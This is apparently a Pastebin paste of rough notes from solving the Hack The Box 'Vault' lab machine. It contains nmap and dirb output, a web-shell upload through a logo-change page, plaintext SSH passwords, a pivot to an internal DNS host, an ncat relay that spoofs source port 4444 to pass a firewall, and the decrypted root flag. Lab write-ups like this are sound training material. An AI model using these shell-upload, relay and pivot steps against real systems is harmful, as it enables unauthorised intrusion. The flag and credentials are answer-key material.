daily pastebin goal
86%
SHARE
TWEET

Untitled

a guest Nov 6th, 2018 108 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
  2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
  3. Nmap scan report for 10.10.10.109
  4. Host is up (0.15s latency).
  5. Not shown: 998 closed ports
  6. PORT   STATE SERVICE VERSION
  7. 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
  8. | ssh-hostkey:
  9. |   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
  10. |   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
  11. |_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
  12. 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  13. |_http-server-header: Apache/2.4.18 (Ubuntu)
  14. |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
  15. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
  16. TCP/IP fingerprint:
  17. OS:SCAN(V=7.70%E=4%D=11/3%OT=22%CT=1%CU=42739%PV=Y%DS=2%DC=T%G=Y%TM=5BDE0AC
  18. OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)SEQ
  19. OS:(SP=100%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%
  20. OS:TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5
  21. OS:=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
  22. OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
  23. OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
  24. OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
  25. OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
  26. OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
  27. OS:%T=40%CD=S)
  28.  
  29. Network Distance: 2 hops
  30. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  31.  
  32. TRACEROUTE (using port 554/tcp)
  33. HOP RTT       ADDRESS
  34. 1   193.74 ms 10.10.14.1
  35. 2   105.66 ms 10.10.10.109
  36.  
  37. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  38. Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds
  39.  
  40.  
  41. root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
  42. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
  43. Nmap scan report for 10.10.10.109
  44. Host is up (0.14s latency).
  45. Not shown: 997 closed ports
  46. PORT     STATE         SERVICE
  47. 389/udp  open|filtered ldap
  48. 631/udp  open|filtered ipp
  49. 5353/udp open|filtered zeroconf
  50.  
  51. Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds
  52.  
  53.  
  54. root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
  55. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
  56. Nmap scan report for 10.10.10.109
  57. Host is up (0.14s latency).
  58. Not shown: 998 closed ports
  59. PORT   STATE SERVICE
  60. 22/tcp open  ssh
  61. | ssh2-enum-algos:
  62. |   kex_algorithms: (6)
  63. |       curve25519-sha256@libssh.org
  64. |       ecdh-sha2-nistp256
  65. |       ecdh-sha2-nistp384
  66. |       ecdh-sha2-nistp521
  67. |       diffie-hellman-group-exchange-sha256
  68. |       diffie-hellman-group14-sha1
  69. |   server_host_key_algorithms: (5)
  70. |       ssh-rsa
  71. |       rsa-sha2-512
  72. |       rsa-sha2-256
  73. |       ecdsa-sha2-nistp256
  74. |       ssh-ed25519
  75. |   encryption_algorithms: (6)
  76. |       chacha20-poly1305@openssh.com
  77. |       aes128-ctr
  78. |       aes192-ctr
  79. |       aes256-ctr
  80. |       aes128-gcm@openssh.com
  81. |       aes256-gcm@openssh.com
  82. |   mac_algorithms: (10)
  83. |       umac-64-etm@openssh.com
  84. |       umac-128-etm@openssh.com
  85. |       hmac-sha2-256-etm@openssh.com
  86. |       hmac-sha2-512-etm@openssh.com
  87. |       hmac-sha1-etm@openssh.com
  88. |       umac-64@openssh.com
  89. |       umac-128@openssh.com
  90. |       hmac-sha2-256
  91. |       hmac-sha2-512
  92. |       hmac-sha1
  93. |   compression_algorithms: (2)
  94. |       none
  95. |_      zlib@openssh.com
  96. 80/tcp open  http
  97.  
  98. Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
  99.  
  100. -----------------
  101. DIRB v2.22
  102. By The Dark Raver
  103. -----------------
  104.  
  105. START_TIME: Sat Nov  3 15:05:13 2018
  106. URL_BASE: http://10.10.10.109/sparklays/
  107. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
  108.  
  109. -----------------
  110.  
  111. GENERATED WORDS: 4612
  112.  
  113. ---- Scanning URL: http://10.10.10.109/sparklays/ ----
  114. + http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
  115. ==> DIRECTORY: http://10.10.10.109/sparklays/design/
  116.  
  117. ---- Entering directory: http://10.10.10.109/sparklays/design/ ----
  118. ==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/
  119.  
  120. ---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----
  121.  
  122. -----------------
  123. END_TIME: Sat Nov  3 15:36:08 2018
  124. DOWNLOADED: 13836 - FOUND: 1
  125.  
  126. LOGIN PAGE
  127. http://10.10.10.109/sparklays/admin.php
  128.  
  129. UPLOAD FILES
  130. http://10.10.10.109/sparklays/design/changelogo.php
  131.  
  132. UPLOADED POWNY@SHELL TO GAIN WEB BROWSER SHELL AND FOUND SSH PASSWORD IN DAVE DESKTOP FOLDER
  133. ssh dave@10.10.10.109
  134. Dav3therav3123
  135.  
  136. FOUND FILE ENTITLED KEY THAT CONTAINS
  137. itscominghome
  138.  
  139. ACCESS WEBSITE FROM SERVER
  140. ssh -D 8080 dave@10.10.10.109
  141.  
  142. MORE CREDENTIALS FOUND
  143. root@DNS: var www DNS desktop# cat ssh
  144. dave
  145. dav3gerous567
  146.  
  147. SSH INTO DNS SERVER
  148. ssh dave@192.168.122.4
  149. dav3gerous567
  150.  
  151. BECOME ROOT
  152. sudo su -
  153. dav3gerous567
  154.  
  155. TRACEROUTE (using port 1723/tcp)                                                                                                                                    
  156. HOP RTT     ADDRESS                                                                                                                                                
  157. 1   0.82 ms 192.168.5.1                                                                                                                                            
  158.                                                                                                                                                                    
  159. Nmap scan report for Vault (192.168.5.2)                                                                                      
  160. Host is up (0.0021s latency).                                                                                                                                      
  161. Not shown: 998 filtered ports                                                                                                                                      
  162. PORT     STATE  SERVICE VERSION                                                                                                                                    
  163. 53/tcp   closed domain                                                                                                                                              
  164. 4444/tcp closed krb524                                                                                                                                              
  165. Too many fingerprints match this host to give specific OS details                                                                                                  
  166. Network Distance: 2 hops                                                                                                                                            
  167.                                                                                                                                                                    
  168. TRACEROUTE (using port 53/tcp)                                                                                                                                      
  169. HOP RTT     ADDRESS                                                                                                                                                
  170. 1   0.98 ms 192.168.122.5                                                                                                                                          
  171. 2   1.86 ms Vault (192.168.5.2)
  172.  
  173. HOW TO +++++====================================================================================================
  174. SEE WHAT PORTS ARE OPEN ON VAULT
  175. cat /var/log/auth.log | grep -a 192.168.5.2 you will see it uses port 4444 for ssh
  176.  
  177. SET UP A LISTENER
  178. ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
  179.  
  180. Check port is open on
  181. /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
  182.  
  183. SSH IN
  184. ssh dave@localhost -p 5555
  185.  
  186. ps aux | grep ncat
  187. port 5555 its being used by someone else
  188.  
  189. dave@vault:~$ ls
  190. root.txt.gpg  
  191.  
  192. SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
  193. root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
  194. [1] 14627
  195.  
  196. COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
  197. root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
  198. dave@localhost's password:
  199. root.txt.gpg                                                 100%  629     0.6KB/s   00:00
  200. [1]+  Done                    ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
  201. root@DNS:~# cd /tmp
  202. root@DNS:/tmp# ls
  203. root.txt.gpg                                                                       test.txt
  204.  
  205. Connection to 192.168.122.4 closed.
  206. COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
  207. dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
  208. dave@192.168.122.4's password:
  209. root.txt.gpg                                                 100%  629     0.6KB/s   00:00
  210. dave@ubuntu:~$ cd /dev/shm
  211.  
  212. DECRYPT THE GPG ROOT FILE
  213. dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
  214.  
  215. You need a passphrase to unlock the secret key for
  216. user: "david <dave@david.com>"
  217. 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
  218.  
  219. gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
  220.       "david <dave@david.com>"
  221.  
  222. ROOT FILE
  223. ca468370b91d1f5906e31093d9bfe819
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top